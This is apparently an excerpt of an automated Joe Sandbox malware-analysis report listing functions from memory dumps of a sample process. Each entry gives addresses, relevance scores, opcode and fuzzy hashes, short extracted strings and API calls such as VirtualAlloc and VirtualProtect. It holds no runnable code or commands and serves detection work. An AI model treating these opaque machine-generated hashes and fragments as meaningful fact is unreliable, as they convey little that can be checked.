Instruction ID: 904872f40fa0fc4653fdbeb3798958929cd54e1ecfa526c0463fcde4bdb653b4
Opcode Fuzzy Hash: fb7783502db39ab94165d82667f36ffb70b4927d29f44a11893a20703d3ab998
Instruction Fuzzy Hash: 24430E70D199299FDB98EB18C8957A9B7B1FF68740F1042EAD00DE3292DB346E81CF45

Function 00007FF848F7936D Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F79000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F79000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f79000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1718309a3e84535bf14b59aedd397145ffaad3dc4ddc3417ee3e19297c9126b1
Instruction ID: 7afed6ac9cc275aaca178a8a70795c5cbfa132843e2c5e7440ff707fb49fb25b
Opcode Fuzzy Hash: 1718309a3e84535bf14b59aedd397145ffaad3dc4ddc3417ee3e19297c9126b1
Instruction Fuzzy Hash: 65221870D046198FDB58DFA8C895AEDFBF2FF48300F148669D41AEB285DB34A981CB54

Function 00007FF848F30D74 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fac0a650ec4cce47ec9784c4220a12fd5127ecf461484e525caa75aa3ee2b4
Instruction ID: 9ad4bae613894bd5f3a7584764a16175b5bc277aa719c507594f867b78ffefd8
Opcode Fuzzy Hash: 26fac0a650ec4cce47ec9784c4220a12fd5127ecf461484e525caa75aa3ee2b4
Instruction Fuzzy Hash: 43A18971E19A8E9FE798EB6CC8597A9BFF1FB99350F00017AD009D72D2CB7819418B50

Function 00007FF848F67205 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F65000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f65000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88021d80b9e09fea8438426d5c3259fd6470a9866014e1c9aeaedb1c21d106ec
Instruction ID: a14245f0942e31c7ae417ddb32351b9fa46808bb50a6eb1955df24ac64575f2a
Opcode Fuzzy Hash: 88021d80b9e09fea8438426d5c3259fd6470a9866014e1c9aeaedb1c21d106ec
Instruction Fuzzy Hash: CC6110A684E7C14FD7038B709C666943FB0AF67254B0E46DBD4C4CF0E3E2189A5AD722

Function 00007FF8494A41D7 Relevance: 5.1, Strings: 4, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84<I, xrefs: 00007FF8494A42B2
84<I, xrefs: 00007FF8494A4321
84<I, xrefs: 00007FF8494A42CE
84<I, xrefs: 00007FF8494A4296

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 84<I$84<I$84<I$84<I
API String ID: 0-3944666985
Opcode ID: 6436f303dea6a8342fc0418ca09088fde19ffb0502941e2eea9d79746b505817
Instruction ID: 5faae6df2341537a2e9749ec17f7f6968fbedf3ac6a4524f42795f6645439c6c
Opcode Fuzzy Hash: 6436f303dea6a8342fc0418ca09088fde19ffb0502941e2eea9d79746b505817
Instruction Fuzzy Hash: 1641A53260C9499FDF99FF28D0559E9B3E1FBB9320B0441A9D04EC3592CE24EC95CB81

Function 00007FF8494A4281 Relevance: 5.1, Strings: 4, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84<I, xrefs: 00007FF8494A42B2
84<I, xrefs: 00007FF8494A4321
84<I, xrefs: 00007FF8494A42CE
84<I, xrefs: 00007FF8494A4296

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 84<I$84<I$84<I$84<I
API String ID: 0-3944666985
Opcode ID: a4bc79eda99fb897c5e405e978817d19330b5dfed64469b52b81a35c05766aad
Instruction ID: 65f220ba398460e8eed4bb8063bb8dfece7957954b6e01aba9999e4ec8eeac65
Opcode Fuzzy Hash: a4bc79eda99fb897c5e405e978817d19330b5dfed64469b52b81a35c05766aad
Instruction Fuzzy Hash: E9318231A0C9559FDF99FF28C0599A5B3E1FFA931470442ADD04EC7592CE28EC85CB81

Function 00007FF8494A421B Relevance: 5.1, Strings: 4, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84<I, xrefs: 00007FF8494A42B2
84<I, xrefs: 00007FF8494A4321
84<I, xrefs: 00007FF8494A42CE
84<I, xrefs: 00007FF8494A4296

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 84<I$84<I$84<I$84<I
API String ID: 0-3944666985
Opcode ID: f307ce9ce88c53171cc2ab6f8046472dc49ef753197c747bbac2f79ee99d4ef8
Instruction ID: cf8ac561b1afec8b4b6ee610d7ad508f47a2da6f27ee80332e38f4c340dff43e
Opcode Fuzzy Hash: f307ce9ce88c53171cc2ab6f8046472dc49ef753197c747bbac2f79ee99d4ef8
Instruction Fuzzy Hash: 3F31733260C9499FDF99FF28C0559A5B3E1FBA9314B0441ADD04EC7592CF28ED85CB81

Function 00007FF8494AABB9 Relevance: 3.8, Strings: 3, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84<I, xrefs: 00007FF8494AAC11
84<I, xrefs: 00007FF8494AABF5
84<I, xrefs: 00007FF8494AABD9

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 84<I$84<I$84<I
API String ID: 0-4191249531
Opcode ID: 468eccd526b3d27c5e87bdbe6807339e768f8e3d1b80fea8a58423427ec64666
Instruction ID: 5140ccaf9c3e83cc1628fa3fbb5bb43c9bc8e12949a6899e3d8f4a9d7d5d349c
Opcode Fuzzy Hash: 468eccd526b3d27c5e87bdbe6807339e768f8e3d1b80fea8a58423427ec64666
Instruction Fuzzy Hash: 7301D221D0DAD2AFE6A9FB2484256B5A791FF66750F4840F8D14D830C3C91CAC84C767

Function 00007FF8494A9235 Relevance: 3.5, Strings: 2, Instructions: 1029
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(S<I, xrefs: 00007FF8494A9962
(S<I, xrefs: 00007FF8494A94C1

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: (S<I$(S<I
API String ID: 0-13847173
Opcode ID: e2689e5f2045ebdc8e5cdb2ff96e53d254de2ce5513d2c51091eb6a52c78e26a
Instruction ID: 1e8a0305fdcf8bca1c66a2ca06becfa598c81c7e819d2bb74fb993a86e689027
Opcode Fuzzy Hash: e2689e5f2045ebdc8e5cdb2ff96e53d254de2ce5513d2c51091eb6a52c78e26a
Instruction Fuzzy Hash: 29627131A189498FEB98FF6CC455AB573E2EFA8750F1441B9D00EC32A6DE28ED42C745

Function 00007FF848F7C59D Relevance: 2.9, Strings: 2, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@aH, xrefs: 00007FF848F7C68A
]H_H, xrefs: 00007FF848F7C76F

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F79000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F79000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f79000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: @aH$]H_H
API String ID: 0-4254196199
Opcode ID: 8ece2c385dc34e66fcc68bad1c5d1277c62b0fb1e104a4ea13c0af50cca6486b
Instruction ID: c0e046d726bb65bf239ee89f1cf4a73d214247c59e8a09f6dc9d879fdded2100
Opcode Fuzzy Hash: 8ece2c385dc34e66fcc68bad1c5d1277c62b0fb1e104a4ea13c0af50cca6486b
Instruction Fuzzy Hash: 11F15A31D18A999FEB98EB68C8957E8B7B1FF58340F1441B9D00DE32C2DB386985CB45

Function 00007FF848F7C5B0 Relevance: 2.8, Strings: 2, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@aH, xrefs: 00007FF848F7C68A
]H_H, xrefs: 00007FF848F7C76F

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F79000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F79000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f79000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: @aH$]H_H
API String ID: 0-4254196199
Opcode ID: 88cd344241191ae10265a8e4d0e96abe7abc79f83e84cebe14f2a350238196a2
Instruction ID: 354bc125a1c43db217881d9ed7c9f8540ae2b5825cf9bfc2a9b7373d04bd23bb
Opcode Fuzzy Hash: 88cd344241191ae10265a8e4d0e96abe7abc79f83e84cebe14f2a350238196a2
Instruction Fuzzy Hash: DDC12A32D19A5A9EEB98EB28C8657F9B7B1FF58340F1441B9C00DD3282DF386985CB45

Function 00007FF8494A4611 Relevance: 2.7, Strings: 2, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84<I, xrefs: 00007FF8494A4660
84<I, xrefs: 00007FF8494A4696

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 84<I$84<I
API String ID: 0-1807493996
Opcode ID: 61c0ad290c4e9a441e9191c96227633450934dbdafc14871d485a39aa1fda162
Instruction ID: fc947cb3ab5325a89d1be998481fe607da903052ddc7d93d93f0e528ba022eb4
Opcode Fuzzy Hash: 61c0ad290c4e9a441e9191c96227633450934dbdafc14871d485a39aa1fda162
Instruction Fuzzy Hash: 8D51A43160CA899FDBA8FF28D459DB937E1EB6936071441B9D00EC79A2DE2CEC41C785

Function 00007FF8494AB0B0 Relevance: 2.6, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84<I, xrefs: 00007FF8494AB0E3
84<I, xrefs: 00007FF8494AB0BF

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 84<I$84<I
API String ID: 0-1807493996
Opcode ID: 771c0cf5416a65e4ae0035f10a1aa674f00af71bdd8d9c0de40467071bde6289
Instruction ID: 3faea59d3d96a24781b5b09640ed818cc461035caf8b515fa326ec9a113c5cf1
Opcode Fuzzy Hash: 771c0cf5416a65e4ae0035f10a1aa674f00af71bdd8d9c0de40467071bde6289
Instruction Fuzzy Hash: 2711AC3191CA81CFD668FF28C4958B477A0EF69384B1440BCD04EC72A3CE29E984CB46

Function 00007FF848F52F8F Relevance: 2.5, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+, xrefs: 00007FF848F52F9D
M, xrefs: 00007FF848F52FCD

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f4a000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: +$M
API String ID: 0-853322904
Opcode ID: 74fb6bee70991b59c32e69eb886f265766d2401c1ba730dc8452d2ae0446b0ce
Instruction ID: 62eeb99458db6b515472c8ac78c8f9e2927a9b9a8c509462000263b8aed35e7a
Opcode Fuzzy Hash: 74fb6bee70991b59c32e69eb886f265766d2401c1ba730dc8452d2ae0446b0ce
Instruction Fuzzy Hash: 9C11373094892B8FEB64EB04C848BF9B3A1FB54380F0042F5C01D96AC2DF7829C59F84

Function 00007FF8494A5CA4 Relevance: 1.9, Strings: 1, Instructions: 605
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xN>I, xrefs: 00007FF8494A5E0E

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: xN>I
API String ID: 0-3138262508
Opcode ID: 495bc247f032e0a715b96ff13545464c2475f693df44fe104726f3825e399a1a
Instruction ID: 45f83dd61e791e6171d79f007fa96898e092031c49e8fe33c19783d9cfd5e766
Opcode Fuzzy Hash: 495bc247f032e0a715b96ff13545464c2475f693df44fe104726f3825e399a1a
Instruction Fuzzy Hash: D4223231A08A598FDB98FF18C499EA977E2FF69314F1441A9D00EC72A6DE34ED41CB41

Function 00007FF848F43091 Relevance: 1.8, APIs: 1, Instructions: 517
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FF848F434EF

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f3d000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5f5bcbb34cd83881196ba2525bb0cd5aa0bf7b739e01e58910656ad2ca809c79
Instruction ID: d4d29fd3f5f65fd538699c08b74b6decce5e8e4b8661666a8c765671b69f3039
Opcode Fuzzy Hash: 5f5bcbb34cd83881196ba2525bb0cd5aa0bf7b739e01e58910656ad2ca809c79
Instruction Fuzzy Hash: AA027F7080D68D8FDB95EF68C855AE9BBF0FF69300F0441ABD449D7292DB38A985CB41

Function 00007FF8494A9286 Relevance: 1.8, Strings: 1, Instructions: 505
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(S<I, xrefs: 00007FF8494A94C1

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: (S<I
API String ID: 0-1456163055
Opcode ID: c4d72d8ff572c4de6ef402745f86165c9aef9390d095853b1a37da57f780b1ad
Instruction ID: a4ae40d7c84204ea9512b642d709400ca100262b739a2d89ada48704ae6e6902
Opcode Fuzzy Hash: c4d72d8ff572c4de6ef402745f86165c9aef9390d095853b1a37da57f780b1ad
Instruction Fuzzy Hash: B4F15031A189498FDB98FF6CC459AB573E2EFA8750F1441B9D00EC32A6DE28ED42C741

Function 00007FF848F419DE Relevance: 1.7, APIs: 1, Instructions: 191memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 00007FF848F41B1A

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f3d000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 22226f8a64b24248b59abba95457cafb180be007b7fbb21b0af5787545b5c7a5
Instruction ID: bd71d9be90dd137b61df7e5bcb6e601a70104b6e9c0eecb015536feb53d1f6c2
Opcode Fuzzy Hash: 22226f8a64b24248b59abba95457cafb180be007b7fbb21b0af5787545b5c7a5
Instruction Fuzzy Hash: AD518C30D0864C8FDB55DFA8C885BEDBBF1FB6A310F1042AAD448E3252DB74A885CB41

Function 00007FF848F8B2F5 Relevance: 1.6, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

M_H, xrefs: 00007FF848F8B38D

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F79000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F79000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f79000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: M_H
API String ID: 0-372873180
Opcode ID: 68dedccd98b167112be7224204b0fcf0e3794d7dedd38f1acfd95cfdb696d461
Instruction ID: dc5bad015ec58232a249e00f22e5aec0658626df8e6ece6841b897094a3b5911
Opcode Fuzzy Hash: 68dedccd98b167112be7224204b0fcf0e3794d7dedd38f1acfd95cfdb696d461
Instruction Fuzzy Hash: FFC15631E1DA8A4FE789EB2898656B97BF1FF99340F0441BAC00DD72D6DF285C028755

Function 00007FF848F6EBC9 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

8I_H, xrefs: 00007FF848F6EC70

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F65000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f65000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 8I_H
API String ID: 0-783560996
Opcode ID: 35f406bc2924db1345b031fd9d984d019fd37d133d6a850caa0ab6df61024c51
Instruction ID: a1654fac000aad13ded545e3340de58d189d49615319a5001d2551ffb564d1e1
Opcode Fuzzy Hash: 35f406bc2924db1345b031fd9d984d019fd37d133d6a850caa0ab6df61024c51
Instruction Fuzzy Hash: 76C10570E08A5D8FDB94EF68C894BADB7B2FF58340F5041A9D00DE7296CB34A981CB40

Function 00007FF8494A2798 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

, xrefs: 00007FF8494A2812

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 52266fa0c313b00da15c11a38e18a2bb3647fd16a920c506f3441302d91e6ceb
Instruction ID: ac5783e90203134b07c7cfd0b4faae923c5d3c971202aa22e25a849471567174
Opcode Fuzzy Hash: 52266fa0c313b00da15c11a38e18a2bb3647fd16a920c506f3441302d91e6ceb
Instruction Fuzzy Hash: 29515A30E0C68A9FDB69EF98D4545FDB7B1FF48350F1041BAD00AE7686DA382A01CB54

Function 00007FF8494AAC77 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

84<I, xrefs: 00007FF8494AACDB

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 84<I
API String ID: 0-1263190741
Opcode ID: 403157525197f87cacc6097d973f14429e9e8906fedadc2ed283b7af60cf5db2
Instruction ID: 3b3a869bb4caa63fbe91a69ebc59315454127c10125930769f6355bd95f29b0a
Opcode Fuzzy Hash: 403157525197f87cacc6097d973f14429e9e8906fedadc2ed283b7af60cf5db2
Instruction Fuzzy Hash: F331B531608D188FDF98FF28C098EA673E1FBB87157148199D00AC76A5DE35ED85CB81

Function 00007FF8494AA133 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

84<I, xrefs: 00007FF8494AA150

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 84<I
API String ID: 0-1263190741
Opcode ID: dae6ca6b9f878b4ea9aa1f74b5e416322fe4e8d2d4c157a27fba627442bbb81e
Instruction ID: 12f96137c8da495e10ad4bd884bd53890c2f5ad593dbc643f883914516876a41
Opcode Fuzzy Hash: dae6ca6b9f878b4ea9aa1f74b5e416322fe4e8d2d4c157a27fba627442bbb81e
Instruction Fuzzy Hash: 92318331A0CA89DFDBA8EF18C444AB977E2FF68351F54407AD40ED32D1CE28A841CB56

Function 00007FF8494A3FE5 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

84<I, xrefs: 00007FF8494A4029

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 84<I
API String ID: 0-1263190741
Opcode ID: d4ce973c4e8a580282d2d8a7ac6684aedef3b2e230777ea9813abbdb4a353dfc
Instruction ID: 9c73338f9ff2d07cddfd4b308a78c2bc7c773723da9ca33ca995f9727f291364
Opcode Fuzzy Hash: d4ce973c4e8a580282d2d8a7ac6684aedef3b2e230777ea9813abbdb4a353dfc
Instruction Fuzzy Hash: 3F31683091CA8ACFEBA8EF54C4415BD7AB1FF58354F50007AD00ED7981DB386944E78A

Function 00007FF8494A4AC5 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

84<I, xrefs: 00007FF8494A4B0C

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 84<I
API String ID: 0-1263190741
Opcode ID: b5c00624b32f44dbb67fe6d73f65ae30a8f78c2e32a0cc086e3f30f84c586cad
Instruction ID: f605d7c9437c5b0a98d4f1d5144770772f4b449ef88d94ae5275b8a727b2d791
Opcode Fuzzy Hash: b5c00624b32f44dbb67fe6d73f65ae30a8f78c2e32a0cc086e3f30f84c586cad
Instruction Fuzzy Hash: 30215331D1CA8A8FE774EF54D4506BDB7A1FF483A0F54017AD00ED7A81DB286841D756

Function 00007FF848F3A898 Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

x, xrefs: 00007FF848F3A978

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F36000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F36000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f36000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: x
API String ID: 0-2363233923
Opcode ID: 9d1affb4c10a35efeb0613758a50b9ec9e0468cd39b321730a392cbc383d8505
Instruction ID: 635a476d8d42210e705b54b7f83943c236fc7e69f4389f8b4368c5d8bf822e16
Opcode Fuzzy Hash: 9d1affb4c10a35efeb0613758a50b9ec9e0468cd39b321730a392cbc383d8505
Instruction Fuzzy Hash: 70211D70D0996A8EE760EB24C8897E9B7B1EF44340F1081F6D00D93295DF786EC58F54

Function 00007FF8490E72E0 Relevance: 1.3, Strings: 1, Instructions: 13COMMON

Download Yara Rule

Strings

5, xrefs: 00007FF8490E72FB

Memory Dump Source

Source File: 00000020.00000002.3538697330.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8490e0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 56c3fd86c961be79beda3f7824755f81bbc6f886914f62c555cc088777985073
Instruction ID: dc2f76c107f12b35d82d68bffd02c56553e5c30f1743c3c6644c50ff4b305bba
Opcode Fuzzy Hash: 56c3fd86c961be79beda3f7824755f81bbc6f886914f62c555cc088777985073
Instruction Fuzzy Hash: 90D09E74A0C6898FDF58EF18C8919BE7BB1FF58344F100529E44A93280CB39E550CB81

Function 00007FF8494A7311 Relevance: .9, Instructions: 888COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90cb323408870551d3df9bc9af09d161828b099b4610f175d547be5e46fa47ea
Instruction ID: fdcb26f7c35bd53ebf4a8f4339b825da2038a2ae3b42a2b1e211a8e31737031b
Opcode Fuzzy Hash: 90cb323408870551d3df9bc9af09d161828b099b4610f175d547be5e46fa47ea
Instruction Fuzzy Hash: 31523130A189198FDB98FF28C499EA577E1FF68745F1081A9D00EC72A6DE34ED85CB41

Function 00007FF8494A5404 Relevance: .9, Instructions: 863COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8092fb0c452ae9f9ac9584bc72a59ed65a280dcfa3e88e3999a4353cff671f6
Instruction ID: c29eb7af225d81389cc96b9b6bf69053218d20b74a1f8edd98cc142373ff31a1
Opcode Fuzzy Hash: b8092fb0c452ae9f9ac9584bc72a59ed65a280dcfa3e88e3999a4353cff671f6
Instruction Fuzzy Hash: E3527531A089598FDB98FF18C499EA977E2FF68354F1481A9D00EC7296DE35EC81CB41

Function 00007FF8494ABF61 Relevance: .7, Instructions: 660COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5150225ef8ce18300864f72fb6947d14c86b1565381c9b4925b452266216acc1
Instruction ID: 1c680b74e1b2d9f8dacf8180da546d36944a088de9882f506f2f7930b2ab9bbf
Opcode Fuzzy Hash: 5150225ef8ce18300864f72fb6947d14c86b1565381c9b4925b452266216acc1
Instruction Fuzzy Hash: F6224671A0DBC98FD7A5EB28C445ABA7BA0FFA5310F1045BBC04EC7197DD28A905C786

Function 00007FF8494A3A50 Relevance: .6, Instructions: 570COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0abeb456458d68ca3074d57a3224b207d3f0f87088e82415da0d57c6a696df5d
Instruction ID: db11abfbdeabfb27a1c7100902cfdd564ffdbd04f563a66c84ad1213f48e7566
Opcode Fuzzy Hash: 0abeb456458d68ca3074d57a3224b207d3f0f87088e82415da0d57c6a696df5d
Instruction Fuzzy Hash: 0D021431A1DB868FE378EF28D895075B7E1FF443A4B1445BED04AC3682EA29B846C745

Function 00007FF8494A2A0F Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83b457cd003d33a579e790da2e9041064bd2b1750b07cfab6820e3dccaab1db7
Instruction ID: f2026cd27a0112d76102092c68bbb4099547e86e492b1144898866795804050f
